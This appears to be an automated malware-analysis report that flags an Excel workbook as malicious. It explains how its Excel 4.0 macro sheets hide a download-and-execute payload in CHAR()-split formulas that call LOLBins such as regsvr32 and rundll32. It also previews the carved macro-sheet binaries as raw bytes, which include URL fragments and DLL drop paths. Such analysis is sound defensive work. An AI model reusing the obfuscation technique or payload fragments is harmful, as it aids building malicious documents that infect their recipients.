MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macro sheets, which are known to be used for malicious purposes. The heuristic 'OOXML_XLM_REASSEMBLED_PAYLOAD' indicates that the macro sheet contains obfuscated formulas that, when reassembled, form a URL pointing to a payload. This suggests the document is designed to download and execute a secondary malicious file.
Heuristics 2
-
Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
-
XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOADAn Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.bin |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet1.bin | 5827 bytes |
SHA-256: 508ebb8d8a17285393862b61fecdeed5c080c23d0f0c6acb0ee14b69006c8270 |
|||
Preview scriptFirst 1,000 lines of the extracted script
� � � @ �������� � � F � % �� & � � @ d � $ � � % �� & � I , � < 8 I < 9 9 $ < : B I < C �? I � � % �� & , : C : < = > ? @ B % �� & , : C : < = > ? @ B % �� & , : C : < = > ? @ B % �� & , : C : < = > ? @ A B C % �� & , : C : < =
> ? @ A B C % �� & , : F : < = > ? @ A B C D E F % �� & ! , : F :
< = > ? A B C D E F % �� & " , : F : < = > ? @ A B C D E F % �� & # , : F : < = > ? @ A B C D E F % �� & $ , : F : = > ? @ A B C D E F % �� & % , : F : = > ? @ A B C D E F % �� & & , : F : = > ? @ A B C D E F % �� & ' , : F > ? @ A B C D E F % �� & ( , : F =
A C D E F % �� & ) , : F : = A B C D E F % �� & * , : F : = A B C D E F % �� & + , : F : = A B C D E F % �� & , , : F = A B C D E F % �� & - , : F A B C D E F % �� & . , : F A B C D E F % �� & / , : F A B C D E F % �� & 0 , 5 F A B C D E F % �� & 1 , 5 F 5 A B C D E F % �� & 2 , 5 F A B C D E F % �� & 3 , 5 F A B C D E F % �� & 4 , 5 F A B C D E F % �� & 5 , 5 F A B C D E F % �� & 6 , 5 F A B C D E F % �� & 7 , 5 F B % �� & 8 , 5 F B % �� & 9 , 5 F B % �� & ; , 5 F B % �� & < , 5 F B
... (truncated)
|
|||
xlm_sheet_01.bin |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet2.bin | 1178 bytes |
SHA-256: b34c069544e61839546fe6147d50d4d57faaab7f5999396424a57010ce22ac77 |
|||
Preview scriptFirst 1,000 lines of the extracted script
� � � @ �������� � & 4 � % �� & � � @ d d � $ � � % �� & � � , � < 0 0 < 1 4 � � � % �� & , & 2 & % �� & , & 2 & 2 % �� &
, & 2 2 % �� & , & 2 2 % �� & , & 2 2 % �� &
, & 2 / 2 % �� & , & 2 / 0 % �� & , & 2 / 0 2 % �� & , 0 3 0 % �� & , 0 3 0 % �� & , 0 3
0 B 6 % �� & , 0 3 0 1 3 % �� & , 0 3 0 1 3 � � B � �%� 0ffffff�?ffffff�? �? �?333333�?333333�?% �� & �
|
|||
xlm_sheet_02.bin |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet3.bin | 3882 bytes |
SHA-256: b02fcdc5ad50c04571b013535f6c5281ce7e6fb4692238921aca64c643cfa115 |
|||
Preview scriptFirst 1,000 lines of the extracted script
� � � @ �������� � # ; = C � % �� & � � @ d d � $ � � % �� & � � , � < < < m < = C � � � % �� & # , = C � = $ � �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA Z ?�: 2�B `� ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� �������TA ��;�u')LAc ��9��9HA� U Z 2� Z ?� Z ?� : 2�B `� % �� & $ , = C = % �� & % , = C )= Z # B�: 2�B `� % �� & & , = C C= 0 Z @�Z @� Z @� B : 2�B `� % �� & ' , = C )= Z . C�: 2�B `� % �� & ( , = C )= Z $ B�: 2�B `� % �� & ) , = C )= Z & >�: 2�B `� % �� & * , = C i= V U Z 2� Z ?� Z =� Z ?� Z ! ?� Z =� e A : 2�B `� % �� & + , = C � = $ Z & =�Z B� Z 2� Z * =� Z 2� Z ( =� Z ) =� Z ( =� Z 2� Z ( =� Z ) =� Z ( =� Z 2� Z ( =� Z , =� Z ) =� Z ( =� h t t p s : / / Z 2� Z ( =� Z ) =� Z ( =� Z 4 B� Z ( =� Z , =� Z , =� Z + =� : 0�B `� % �� & - , = C %= D o c 2 B � % �� & . , = C 8= % D o c 4 B � D o c 3 B � HC L 0 L d e c v s b g v r s x L x r g x g L B t % �� & 1 , = B � = p Z 2�Z :� Z # :� Z $ :� Z % :� Z ! :� Z " :� Z ! :� Z 3 B� Z :� : 0�B `� B % �� & 2 , = B � = p Z 2�Z :� Z # :� Z $ :� Z % :� Z ! :� Z " :� Z ! :� Z 4 B� Z :� : 0�B `� B % �� & 3 , = B IB . . \ c o v i 1 . d l l . . \ c o v i 1 . d l l % �� & 4 , = B � = 4 Z & =�Z B� Z 2� Z * =� Z 2� Z ( =� Z ) =� Z ( =� Z 2� Z ( =� Z ) =� Z ( =� Z 2� Z ( =� Z , =� Z ) =� Z ( =� h t t p s : / / Z 2� Z ( =� Z ) =� Z ( =� Z 3 B� Z ( =� Z , =� Z , =� Z + =� : 0�B `� � A ��A/ IB . . \ c o v i 2 . d l l . . \ c o v i 2 . d l l % �� & 5 , = B B % �� & 6 , = B B % �� & 8 , = B = : 0�A5 % �� & ; , = B FB L . L d e c v s b g v r s x L x r g x g B s � � B � � 0ffffff�?ffffff�? �? �?333333�?333333�?% �� & � |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.